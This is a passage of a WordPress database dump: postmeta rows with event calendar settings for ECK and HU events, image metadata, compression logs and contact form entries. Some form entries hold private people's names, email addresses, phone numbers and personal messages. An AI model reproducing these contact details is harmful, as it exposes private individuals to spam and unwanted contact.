,'mec_reg_fields_global_inheritance','1'),(156049,266375,'mec_reg_fields','a:0:{}'),(156050,266375,'mec_bfixed_fields','a:0:{}'),(156051,266375,'mec_op','a:0:{}'),(156052,266375,'mec_fields','a:0:{}'),(156053,266375,'mec_event_status','EventScheduled'),(156054,266375,'mec_moved_online_link',''),(156055,266375,'mec_cancelled_reason',''),(156056,266375,'mec_display_cancellation_reason_in_single_page',''),(156057,266375,'boldgrid_hide_page_title','0'),(156058,266375,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156059,266375,'passster_activate_global_protection',NULL),(156060,266375,'passster_activate_protection',NULL),(156061,266375,'passster_protection_type','password'),(156062,266375,'sg_popup_target_custom','a:1:{i:0;s:6:\"264857\";}'),(156063,266375,'sgpb_popup_events_custom','a:1:{i:264857;a:1:{i:0;s:5:\"click\";}}'),(156066,266375,'_dp_original','266169'),(156065,266375,'_thumbnail_id','266378'),(156067,266375,'_edit_lock','1647807991:2'),(156068,266375,'_edit_last','15'),(156069,266377,'_wp_attached_file','2022/03/RandomWalk.html'),(156070,266369,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/03/Relationships.webp - cannot be optimized, it has an invalid file type'),(156071,266369,'smush-complete',''),(156072,266373,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/03/GoldenHU.webp - cannot be optimized, it has an invalid file type'),(156073,266373,'smush-complete',''),(156074,266377,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/03/RandomWalk.html - cannot be optimized, it has an invalid file type'),(156075,266377,'smush-complete',''),(156076,266378,'_wp_attached_file','2022/03/RandomWalk.png'),(156077,266378,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:505;s:4:\"file\";s:22:\"2022/03/RandomWalk.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"RandomWalk-300x168.png\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"RandomWalk-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"RandomWalk-768x431.png\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:22:\"RandomWalk-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:22:\"RandomWalk-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:22:\"RandomWalk-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:22:\"RandomWalk-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156078,266378,'original-file','2022/03/RandomWalk-updraft-pre-smush-original.png'),(156079,266378,'smush-complete','1'),(156080,266378,'smush-info','The file was compressed from 736.72 KB to 246.33 KB saving 66.56 percent using WP-Optimize'),(156081,266378,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:754404;s:12:\"smushed-size\";i:252241;s:15:\"savings-percent\";d:66.56000000000000227373675443232059478759765625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:754404;s:10:\"compressed\";i:252241;}s:6:\"medium\";a:2:{s:8:\"original\";i:93955;s:10:\"compressed\";i:31960;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:43800;s:10:\"compressed\";i:15094;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:521369;s:10:\"compressed\";i:181178;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:154996;s:10:\"compressed\";i:51737;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:259505;s:10:\"compressed\";i:86493;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:179311;s:10:\"compressed\";i:60033;}s:8:\"tileview\";a:2:{s:8:\"original\";i:193424;s:10:\"compressed\";i:65696;}}}'),(156082,266380,'_field_425','Amanda'),(156083,266380,'_field_426','Owen'),(156084,266380,'_field_427','amanda.1370@yahoo.com'),(156085,266380,'_form_id','46'),(156086,266380,'_seq_num','49'),(156087,266381,'_field_425','Amanda'),(156088,266381,'_field_426','Owen'),(156089,266381,'_field_427','amanda.1370@yahoo.com'),(156090,266381,'_form_id','46'),(156091,266381,'_seq_num','50'),(156092,266382,'_field_133','Kim'),(156093,266382,'_field_134','Bessling'),(156094,266382,'_field_135','kbessling@bendbroadband.com'),(156095,266382,'_field_137','Eck seminars and/or HI Retreats'),(156096,266382,'_field_138','Hello,\nMy husband and I recently retired and are planning some RV trips around the USA. We are planning these trips based on ECK seminars and / or HI retreats that we can attend. Are you planning any of these in the next 6 -12 months in your state?\nThank you in advance for any information you can provide to us even if it means forwarding another persons name who we can contact.\nMay the blesslings be,\n\nKim &amp; Ron Bessling\nHI Eckists in Bend, OR\nC 541-306-7055\nkbessling@bendbroadband.com'),(156097,266382,'_form_id','13'),(156098,266382,'_seq_num','101'),(156099,266383,'_field_212','Patricia'),(156100,266383,'_field_213','Lafferty'),(156101,266383,'_field_214','bluestarlove1989@gmail.com'),(156102,266383,'_field_215','(303) 359-8422'),(156103,266383,'_field_216','Denver'),(156104,266383,'_field_219','ESA/Initiator-Kimberly Young'),(156105,266383,'_field_220','Hi Kimberly,\n\nI would like to schedule an ESA session with you.  Thanks, Pat'),(156106,266383,'_form_id','20'),(156107,266383,'_seq_num','3'),(160406,266597,'mec_end_time_minutes','30'),(160407,266597,'mec_end_time_ampm','PM'),(160408,266597,'mec_end_day_seconds','52200'),(160409,266597,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-08\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-08\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(160410,266597,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(160411,266597,'mec_certain_weekdays','a:0:{}'),(160412,266597,'mec_allday','0'),(160413,266597,'mec_hide_time','0'),(160414,266597,'mec_hide_end_time','0'),(160415,266597,'mec_comment',''),(160416,266597,'mec_repeat_status','0'),(160417,266597,'mec_repeat_type',''),(160418,266597,'mec_repeat_interval','1'),(160419,266597,'mec_repeat_end',''),(160420,266597,'mec_repeat_end_at_occurrences',''),(160421,266597,'mec_repeat_end_at_date',''),(160422,266597,'mec_advanced_days','a:0:{}'),(160423,266597,'mec_in_days',''),(160424,266597,'mec_not_in_days',''),(160425,266597,'mec_hourly_schedules','a:0:{}'),(160426,266597,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(160427,266597,'mec_tickets','a:0:{}'),(160428,266597,'mec_fees_global_inheritance','1'),(160429,266597,'mec_fees','a:0:{}'),(160430,266597,'mec_ticket_variations_global_inheritance','1'),(160431,266597,'mec_ticket_variations','a:0:{}'),(160432,266597,'mec_reg_fields_global_inheritance','1'),(160433,266597,'mec_reg_fields','a:0:{}'),(160434,266597,'mec_op','a:0:{}'),(160435,266597,'mec_event_date_submit','20210422105713'),(160436,266597,'mec_read_more',''),(160437,266597,'mec_more_info',''),(160438,266597,'mec_more_info_title',''),(160439,266597,'mec_more_info_target','_self'),(160440,266597,'mec_cost',''),(160441,266597,'mec_currency','a:0:{}'),(160442,266597,'mec_additional_organizer_ids','a:0:{}'),(160443,266597,'mec_additional_location_ids','a:0:{}'),(160444,266597,'one_occurrence','0'),(160445,266597,'mec_timezone','global'),(160446,266597,'mec_countdown_method','global'),(160447,266597,'mec_public','1'),(160448,266597,'mec_bfixed_fields','a:0:{}'),(160449,266597,'mec_fields','a:0:{}'),(160450,266597,'mec_event_status','EventScheduled'),(160451,266597,'mec_moved_online_link',''),(160452,266597,'mec_cancelled_reason',''),(160453,266597,'mec_display_cancellation_reason_in_single_page',''),(160454,266597,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(160455,266597,'passster_activate_global_protection',NULL),(160456,266597,'passster_activate_protection',NULL),(160457,266597,'passster_protection_type','password'),(160458,266597,'_wp_old_date','2022-01-18'),(160459,266597,'boldgrid_in_page_containers','1'),(160460,266597,'_dp_original','265425'),(160461,266597,'_edit_lock','1651190471:15'),(160462,266597,'_edit_last','15'),(160463,266598,'_wp_attached_file','2022/04/HUSoS2.webp'),(160464,266598,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:19:\"2022/04/HUSoS2.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"HUSoS2-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"HUSoS2-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:19:\"HUSoS2-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:19:\"HUSoS2-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:19:\"HUSoS2-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:19:\"HUSoS2-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160465,266597,'_thumbnail_id','266598'),(160466,266598,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/04/HUSoS2.webp - cannot be optimized, it has an invalid file type'),(160467,266598,'smush-complete',''),(163506,266764,'boldgrid_in_page_containers','1'),(163508,266764,'_edit_lock','1654486621:2'),(163509,266764,'_edit_last','2'),(163507,266764,'_dp_original','266316'),(163504,266764,'_thumbnail_id','266063'),(163503,266764,'passster_protection_type','password'),(163502,266764,'passster_activate_protection',NULL),(163501,266764,'passster_activate_global_protection',NULL),(160405,266597,'mec_end_time_hour','2'),(160404,266597,'mec_end_date','2022-05-08'),(160403,266597,'mec_start_day_seconds','46800'),(160402,266597,'mec_start_time_ampm','PM'),(160401,266597,'mec_start_time_minutes','0'),(160400,266597,'mec_start_time_hour','1'),(160399,266597,'mec_start_date','2022-05-08'),(160398,266597,'mec_organizer_id','1'),(160394,266597,'protect_children',''),(160395,266597,'mec_color',''),(160396,266597,'mec_location_id','131'),(160397,266597,'mec_dont_show_map','0'),(156346,266396,'protect_children',''),(156347,266396,'mec_color',''),(156348,266396,'mec_location_id','118'),(156349,266396,'mec_dont_show_map','0'),(156350,266396,'mec_organizer_id','1'),(156351,266396,'mec_read_more',''),(156352,266396,'mec_more_info',''),(156353,266396,'mec_more_info_title',''),(156354,266396,'mec_more_info_target','_self'),(156355,266396,'mec_cost',''),(156356,266396,'mec_currency','a:0:{}'),(156357,266396,'mec_additional_organizer_ids','a:0:{}'),(156358,266396,'mec_additional_location_ids','a:0:{}'),(156359,266396,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-16\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-16\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156360,266396,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156361,266396,'mec_certain_weekdays','a:0:{}'),(156362,266396,'mec_allday','0'),(156363,266396,'one_occurrence','0'),(156364,266396,'mec_hide_time','0'),(156365,266396,'mec_hide_end_time','0'),(156366,266396,'mec_comment',''),(156367,266396,'mec_timezone','global'),(156368,266396,'mec_countdown_method','global'),(156369,266396,'mec_public','1'),(156370,266396,'mec_start_date','2022-04-16'),(156371,266396,'mec_start_time_hour','1'),(156372,266396,'mec_start_time_minutes','0'),(156373,266396,'mec_start_time_ampm','PM'),(156374,266396,'mec_start_day_seconds','46800'),(156375,266396,'mec_end_date','2022-04-16'),(156376,266396,'mec_end_time_hour','2'),(156377,266396,'mec_end_time_minutes','0'),(156378,266396,'mec_end_time_ampm','PM'),(156379,266396,'mec_end_day_seconds','50400'),(156380,266396,'mec_repeat_status','0'),(156381,266396,'mec_repeat_type',''),(156382,266396,'mec_repeat_interval','1'),(156383,266396,'mec_repeat_end',''),(156384,266396,'mec_repeat_end_at_occurrences',''),(156385,266396,'mec_repeat_end_at_date',''),(156386,266396,'mec_advanced_days','a:0:{}'),(156387,266396,'mec_in_days',''),(156388,266396,'mec_not_in_days',''),(156389,266396,'mec_hourly_schedules','a:0:{}'),(156390,266396,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(156391,266396,'mec_tickets','a:0:{}'),(156392,266396,'mec_fees_global_inheritance','1'),(156393,266396,'mec_fees','a:0:{}'),(156394,266396,'mec_ticket_variations_global_inheritance','1'),(156395,266396,'mec_ticket_variations','a:0:{}'),(156396,266396,'mec_reg_fields_global_inheritance','1'),(156397,266396,'mec_reg_fields','a:0:{}'),(156398,266396,'mec_bfixed_fields','a:0:{}'),(156399,266396,'mec_op','a:0:{}'),(156400,266396,'mec_fields','a:0:{}'),(156401,266396,'mec_event_status','EventScheduled'),(156402,266396,'mec_moved_online_link',''),(156403,266396,'mec_cancelled_reason',''),(156404,266396,'mec_display_cancellation_reason_in_single_page',''),(156405,266396,'boldgrid_hide_page_title','0'),(156406,266396,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156417,266397,'original-file','2022/03/spring-flowers-4-updraft-pre-smush-original.jpg'),(156418,266397,'smush-complete','1'),(156419,266397,'smush-info','The file was compressed from 92.06 KB to 87.12 KB saving 5.37 percent using WP-Optimize'),(156420,266397,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:94269;s:12:\"smushed-size\";i:89207;s:15:\"savings-percent\";d:5.37000000000000010658141036401502788066864013671875;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:94269;s:10:\"compressed\";i:89207;}s:6:\"medium\";a:2:{s:8:\"original\";i:21986;s:10:\"compressed\";i:21330;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9530;s:10:\"compressed\";i:9464;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:27966;s:10:\"compressed\";i:27417;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:48949;s:10:\"compressed\";i:47744;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:35685;s:10:\"compressed\";i:34699;}s:8:\"tileview\";a:2:{s:8:\"original\";i:34240;s:10:\"compressed\";i:33479;}}}'),(156407,266396,'passster_activate_global_protection',NULL),(156408,266396,'passster_activate_protection',NULL),(156409,266396,'passster_protection_type','password'),(156411,266396,'_dp_original','266104'),(156412,266396,'_edit_lock','1647965392:2'),(156413,266396,'_edit_last','2'),(156414,266397,'_wp_attached_file','2022/03/spring-flowers-4.jpg'),(156415,266397,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:668;s:6:\"height\";i:380;s:4:\"file\";s:28:\"2022/03/spring-flowers-4.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"spring-flowers-4-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"spring-flowers-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"spring-flowers-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"spring-flowers-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"spring-flowers-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"spring-flowers-4-300x380.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156416,266396,'_thumbnail_id','266397'),(160125,266573,'mec_op','a:0:{}'),(160124,266573,'mec_bfixed_fields','a:0:{}'),(160123,266573,'mec_reg_fields','a:0:{}'),(160110,266573,'mec_repeat_end_at_occurrences',''),(160109,266573,'mec_repeat_end',''),(160108,266573,'mec_repeat_interval','1'),(160087,266573,'mec_certain_weekdays','a:0:{}'),(160073,266573,'mec_color',''),(156466,266399,'protect_children',''),(156467,266399,'mec_color',''),(156468,266399,'mec_location_id','118'),(156469,266399,'mec_dont_show_map','0'),(156470,266399,'mec_organizer_id','1'),(156471,266399,'mec_read_more',''),(156472,266399,'mec_more_info',''),(156473,266399,'mec_more_info_title',''),(156474,266399,'mec_more_info_target','_self'),(156475,266399,'mec_cost',''),(156476,266399,'mec_currency','a:0:{}'),(156477,266399,'mec_additional_organizer_ids','a:0:{}'),(156478,266399,'mec_additional_location_ids','a:0:{}'),(156479,266399,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-18\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-18\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156480,266399,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156481,266399,'mec_certain_weekdays','a:0:{}'),(156482,266399,'mec_allday','0'),(156483,266399,'one_occurrence','0'),(156484,266399,'mec_hide_time','0'),(156485,266399,'mec_hide_end_time','0'),(156486,266399,'mec_comment',''),(156487,266399,'mec_timezone','global'),(156488,266399,'mec_countdown_method','global'),(156489,266399,'mec_public','1'),(156490,266399,'mec_start_date','2022-04-18'),(156491,266399,'mec_start_time_hour','3'),(156492,266399,'mec_start_time_minutes','0'),(156493,266399,'mec_start_time_ampm','PM'),(156494,266399,'mec_start_day_seconds','54000'),(156495,266399,'mec_end_date','2022-04-18'),(156496,266399,'mec_end_time_hour','4'),(156497,266399,'mec_end_time_minutes','0'),(156498,266399,'mec_end_time_ampm','PM'),(156499,266399,'mec_end_day_seconds','57600'),(156500,266399,'mec_repeat_status','0'),(156501,266399,'mec_repeat_type',''),(156502,266399,'mec_repeat_interval','1'),(156503,266399,'mec_repeat_end',''),(156504,266399,'mec_repeat_end_at_occurrences',''),(156505,266399,'mec_repeat_end_at_date',''),(156506,266399,'mec_advanced_days','a:0:{}'),(156507,266399,'mec_in_days',''),(156508,266399,'mec_not_in_days',''),(156509,266399,'mec_hourly_schedules','a:0:{}'),(156510,266399,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(156511,266399,'mec_tickets','a:0:{}'),(156512,266399,'mec_fees_global_inheritance','1'),(156513,266399,'mec_fees','a:0:{}'),(156514,266399,'mec_ticket_variations_global_inheritance','1'),(1565